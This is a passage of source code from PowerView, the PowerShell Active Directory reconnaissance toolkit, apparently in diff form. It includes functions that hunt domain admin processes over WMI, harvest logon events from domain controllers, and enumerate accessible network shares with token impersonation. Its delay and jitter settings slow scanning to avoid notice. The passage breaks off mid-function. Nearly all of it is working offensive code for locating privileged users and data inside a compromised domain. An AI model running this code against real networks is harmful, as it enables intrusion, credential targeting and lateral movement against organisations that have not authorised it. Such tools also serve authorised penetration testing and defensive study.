instances of putty.exe running on the current domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainProcess -Domain testlab.local -Credential $Cred + +Searches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials. + +.OUTPUTS + +PowerView.UserProcess +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] + [OutputType('PowerView.UserProcess')] + [CmdletBinding(DefaultParameterSetName = 'None')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] + [String[]] + $ComputerName, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerDomain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerSearchBase, + + [Alias('Unconstrained')] + [Switch] + $ComputerUnconstrained, + + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] + [String] + $ComputerServicePack, + + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] + [String] + $ComputerSiteName, + + [Parameter(ParameterSetName = 'TargetProcess')] + [ValidateNotNullOrEmpty()] + [String[]] + $ProcessName, + + [Parameter(ParameterSetName = 'TargetUser')] + [Parameter(ParameterSetName = 'UserIdentity')] + [ValidateNotNullOrEmpty()] + [String[]] + $UserIdentity, + + [Parameter(ParameterSetName = 'TargetUser')] + [ValidateNotNullOrEmpty()] + [String] + $UserDomain, + + [Parameter(ParameterSetName = 'TargetUser')] + [ValidateNotNullOrEmpty()] + [String] + $UserLDAPFilter, + + [Parameter(ParameterSetName = 'TargetUser')] + [ValidateNotNullOrEmpty()] + [String] + $UserSearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('GroupName', 'Group')] + [String[]] + $UserGroupIdentity = 'Domain Admins', + + [Parameter(ParameterSetName = 'TargetUser')] + [Alias('AdminCount')] + [Switch] + $UserAdminCount, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $StopOnSuccess, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, + + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) + + BEGIN { + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['Domain']) { $ComputerSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + $UserSearcherArguments = @{ + 'Properties' = 'samaccountname' + } + if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity } + if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter } + if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount } + if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential } + + + # first, build the set of computers to enumerate + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + Write-Verbose '[Find-DomainProcess] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + Write-Verbose "[Find-DomainProcess] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainProcess] No hosts found to enumerate' + } + + # now build the user target set + if ($PSBoundParameters['ProcessName']) { + $TargetProcessName = @() + ForEach ($T in $ProcessName) { + $TargetProcessName += $T.Split(',') + } + if ($TargetProcessName -isnot [System.Array]) { + $TargetProcessName = [String[]] @($TargetProcessName) + } + } + elseif ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount'] -or $PSBoundParameters['UserAllowDelegation']) { + $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname + } + else { + $GroupSearcherArguments = @{ + 'Identity' = $UserGroupIdentity + 'Recurse' = $True + } + if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential } + $GroupSearcherArguments + $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $ProcessName, $TargetUsers, $Credential) + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + # try to enumerate all active processes on the remote host + # and search for a specific process name + if ($Credential) { + $Processes = Get-WMIProcess -Credential $Credential -ComputerName $TargetComputer -ErrorAction SilentlyContinue + } + else { + $Processes = Get-WMIProcess -ComputerName $TargetComputer -ErrorAction SilentlyContinue + } + ForEach ($Process in $Processes) { + # if we're hunting for a process name or comma-separated names + if ($ProcessName) { + if ($ProcessName -Contains $Process.ProcessName) { + $Process + } + } + # if the session user is in the target list, display some output + elseif ($TargetUsers -Contains $Process.User) { + $Process + } + } + } + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-DomainProcess] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainProcess] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-DomainProcess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $TargetProcessName, $TargetUsers, $Credential + $Result + + if ($Result -and $StopOnSuccess) { + Write-Verbose "[Find-DomainProcess] Target user found, returning early" + return + } + } + } + else { + Write-Verbose "[Find-DomainProcess] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'ProcessName' = $TargetProcessName + 'TargetUsers' = $TargetUsers + 'Credential' = $Credential + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } +} + + +function Find-DomainUserEvent { +<# +.SYNOPSIS + +Finds logon events on the current (or remote domain) for the specified users. + +Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction + +.DESCRIPTION + +Enumerates all domain controllers from the specified -Domain +(default of the local domain) using Get-DomainController, enumerates +the logon events for each using Get-DomainUserEvent, and filters +the results based on the targeting criteria. + +.PARAMETER ComputerName + +Specifies an explicit computer name to retrieve events from. + +.PARAMETER Domain + +Specifies a domain to query for domain controllers to enumerate. +Defaults to the current domain. + +.PARAMETER Filter + +A hashtable of PowerView.LogonEvent properties to filter for. +The 'op|operator|operation' clause can have '&', '|', 'and', or 'or', +and is 'or' by default, meaning at least one clause matches instead of all. +See the exaples for usage. + +.PARAMETER StartTime + +The [DateTime] object representing the start of when to collect events. +Default of [DateTime]::Now.AddDays(-1). + +.PARAMETER EndTime + +The [DateTime] object representing the end of when to collect events. +Default of [DateTime]::Now. + +.PARAMETER MaxEvents + +The maximum number of events (per host) to retrieve. Default of 5000. + +.PARAMETER UserIdentity + +Specifies one or more user identities to search for. + +.PARAMETER UserDomain + +Specifies the domain to query for users to search for, defaults to the current domain. + +.PARAMETER UserLDAPFilter + +Specifies an LDAP query string that is used to search for target users. + +.PARAMETER UserSearchBase + +Specifies the LDAP source to search through for target users. +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER UserGroupIdentity + +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +.PARAMETER UserAdminCount + +Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged). + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target computer(s). + +.PARAMETER StopOnSuccess + +Switch. Stop hunting after finding after finding a target user. + +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-DomainUserEvent + +Search for any user events matching domain admins on every DC in the current domain. + +.EXAMPLE + +$cred = Get-Credential dev\administrator +Find-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john' + +Search for any user events matching the user 'john' on the 'secondary.dev.testlab.local' +domain controller using the alternate credential + +.EXAMPLE + +'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'} + +Find user events on the primary.testlab.local system where the event matches +the IPAddress '192.168.52.200' or '192.168.52.201'. + +.EXAMPLE + +$cred = Get-Credential testlab\administrator +Find-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'} + +Find user events mathing the specified GUID AND the specified TargetLogonId, searching +through every domain controller in the current domain, enumerating each DC in serial +instead of in a threaded manner, using the alternate credential. + +.OUTPUTS + +PowerView.LogonEvent + +PowerView.ExplicitCredentialLogon + +.LINK + +http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUsePSCredentialType', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] + [OutputType('PowerView.LogonEvent')] + [OutputType('PowerView.ExplicitCredentialLogon')] + [CmdletBinding(DefaultParameterSetName = 'Domain')] + Param( + [Parameter(ParameterSetName = 'ComputerName', Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('dnshostname', 'HostName', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName, + + [Parameter(ParameterSetName = 'Domain')] + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Hashtable] + $Filter, + + [Parameter(ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [DateTime] + $StartTime = [DateTime]::Now.AddDays(-1), + + [Parameter(ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [DateTime] + $EndTime = [DateTime]::Now, + + [ValidateRange(1, 1000000)] + [Int] + $MaxEvents = 5000, + + [ValidateNotNullOrEmpty()] + [String[]] + $UserIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $UserDomain, + + [ValidateNotNullOrEmpty()] + [String] + $UserLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $UserSearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('GroupName', 'Group')] + [String[]] + $UserGroupIdentity = 'Domain Admins', + + [Alias('AdminCount')] + [Switch] + $UserAdminCount, + + [Switch] + $CheckAccess, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $StopOnSuccess, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, + + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) + + BEGIN { + $UserSearcherArguments = @{ + 'Properties' = 'samaccountname' + } + if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity } + if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter } + if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount } + if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount']) { + $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname + } + elseif ($PSBoundParameters['UserGroupIdentity'] -or (-not $PSBoundParameters['Filter'])) { + # otherwise we're querying a specific group + $GroupSearcherArguments = @{ + 'Identity' = $UserGroupIdentity + 'Recurse' = $True + } + Write-Verbose "UserGroupIdentity: $UserGroupIdentity" + if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain } + if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase } + if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential } + $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName + } + + # build the set of computers to enumerate + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + # if not -ComputerName is passed, query the current (or target) domain for domain controllers + $DCSearcherArguments = @{ + 'LDAP' = $True + } + if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential } + Write-Verbose "[Find-DomainUserEvent] Querying for domain controllers in domain: $Domain" + $TargetComputers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname + } + if ($TargetComputers -and ($TargetComputers -isnot [System.Array])) { + $TargetComputers = @(,$TargetComputers) + } + Write-Verbose "[Find-DomainUserEvent] TargetComputers length: $($TargetComputers.Length)" + Write-Verbose "[Find-DomainUserEvent] TargetComputers $TargetComputers" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainUserEvent] No hosts found to enumerate' + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential) + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + $DomainUserEventArgs = @{ + 'ComputerName' = $TargetComputer + } + if ($StartTime) { $DomainUserEventArgs['StartTime'] = $StartTime } + if ($EndTime) { $DomainUserEventArgs['EndTime'] = $EndTime } + if ($MaxEvents) { $DomainUserEventArgs['MaxEvents'] = $MaxEvents } + if ($Credential) { $DomainUserEventArgs['Credential'] = $Credential } + if ($Filter -or $TargetUsers) { + if ($TargetUsers) { + Get-DomainUserEvent @DomainUserEventArgs | Where-Object {$TargetUsers -contains $_.TargetUserName} + } + else { + $Operator = 'or' + $Filter.Keys | ForEach-Object { + if (($_ -eq 'Op') -or ($_ -eq 'Operator') -or ($_ -eq 'Operation')) { + if (($Filter[$_] -match '&') -or ($Filter[$_] -eq 'and')) { + $Operator = 'and' + } + } + } + $Keys = $Filter.Keys | Where-Object {($_ -ne 'Op') -and ($_ -ne 'Operator') -and ($_ -ne 'Operation')} + Get-DomainUserEvent @DomainUserEventArgs | ForEach-Object { + if ($Operator -eq 'or') { + ForEach ($Key in $Keys) { + if ($_."$Key" -match $Filter[$Key]) { + $_ + } + } + } + else { + # and all clauses + ForEach ($Key in $Keys) { + if ($_."$Key" -notmatch $Filter[$Key]) { + break + } + $_ + } + } + } + } + } + else { + Get-DomainUserEvent @DomainUserEventArgs + } + } + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-DomainUserEvent] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainUserEvent] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-DomainUserEvent] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential + $Result + + if ($Result -and $StopOnSuccess) { + Write-Verbose "[Find-DomainUserEvent] Target user found, returning early" + return + } + } + } + else { + Write-Verbose "[Find-DomainUserEvent] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'StartTime' = $StartTime + 'EndTime' = $EndTime + 'MaxEvents' = $MaxEvents + 'TargetUsers' = $TargetUsers + 'Filter' = $Filter + 'Credential' = $Credential + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } +} + + +function Find-DomainShare { +<# +.SYNOPSIS + +Searches for computer shares on the domain. If -CheckShareAccess is passed, +then only shares the current user has read access to are returned. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction + +.DESCRIPTION + +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the available shares for each +machine with Get-NetShare. If -CheckShareAccess is passed, then +[IO.Directory]::GetFiles() is used to check if the current user has read +access to the given share. If -Credential is passed, then +Invoke-UserImpersonation is used to impersonate the specified user before +enumeration, reverting after with Invoke-RevertToSelf. + +.PARAMETER ComputerName + +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +.PARAMETER ComputerDomain + +Specifies the domain to query for computers, defaults to the current domain. + +.PARAMETER ComputerLDAPFilter + +Specifies an LDAP query string that is used to search for computer objects. + +.PARAMETER ComputerSearchBase + +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER ComputerOperatingSystem + +Search computers with a specific operating system, wildcards accepted. + +.PARAMETER ComputerServicePack + +Search computers with a specific service pack, wildcards accepted. + +.PARAMETER ComputerSiteName + +Search computers in the specific AD Site name, wildcards accepted. + +.PARAMETER CheckShareAccess + +Switch. Only display found shares that the local user has access to. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. + +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-DomainShare + +Find all domain shares in the current domain. + +.EXAMPLE + +Find-DomainShare -CheckShareAccess + +Find all domain shares in the current domain that the current user has +read access to. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainShare -Domain testlab.local -Credential $Cred + +Searches for domain shares in the testlab.local domain using the specified alternate credentials. + +.OUTPUTS + +PowerView.ShareInfo +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ShareInfo')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] + [String[]] + $ComputerName, + + [ValidateNotNullOrEmpty()] + [Alias('Domain')] + [String] + $ComputerDomain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerSearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] + [String] + $ComputerServicePack, + + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] + [String] + $ComputerSiteName, + + [Alias('CheckAccess')] + [Switch] + $CheckShareAccess, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, + + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) + + BEGIN { + + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + Write-Verbose '[Find-DomainShare] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + Write-Verbose "[Find-DomainShare] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainShare] No hosts found to enumerate' + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $CheckShareAccess, $TokenHandle) + + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet + } + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + # get the shares for this host and check what we find + $Shares = Get-NetShare -ComputerName $TargetComputer + ForEach ($Share in $Shares) { + $ShareName = $Share.Name + # $Remark = $Share.Remark + $Path = '\\'+$TargetComputer+'\'+$ShareName + + if (($ShareName) -and ($ShareName.trim() -ne '')) { + # see if we want to check access to this share + if 